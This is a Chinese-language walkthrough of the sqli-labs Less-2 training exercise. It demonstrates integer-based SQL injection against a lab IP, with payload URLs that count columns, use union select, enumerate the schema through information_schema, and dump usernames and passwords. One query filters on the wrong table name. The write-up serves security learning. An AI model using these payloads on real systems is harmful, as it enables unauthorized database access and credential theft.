Less-2 GET-Error based- Intiger based
在网址后面加上id=1出现用户名
在后面加上单引号发现报错,然后再加注释依然报错
http://192.168.167.32/sqli2/Less-2/?id=1 and 1=1 显示正常
http://192.168.167.32/sqli2/Less-2/?id=1 and 1=2 显示错误
判断为数字型注入
那么我们就可以用 order by语句逐步判断其表格有几列。
http://192.168.167.32/sqli2/Less-2/?id=1 order by 3 显示正常,说明有3列
然后用判断其第几列有回显
http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,2,3
然后发现2,3,列有回显就可以爆出数据库,列,以及用户和密码;
爆出数据库http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,2,database() 可以查看其数据库名字
知道数据库名字以后可以查看所有数据库
http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata
查看当前数据库中所有表
http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
查看user表中字段
http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='security'
查看用户名和密码
http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,group_concat(concat_ws(':',username,password)) ,3 from users --+
Less-2完成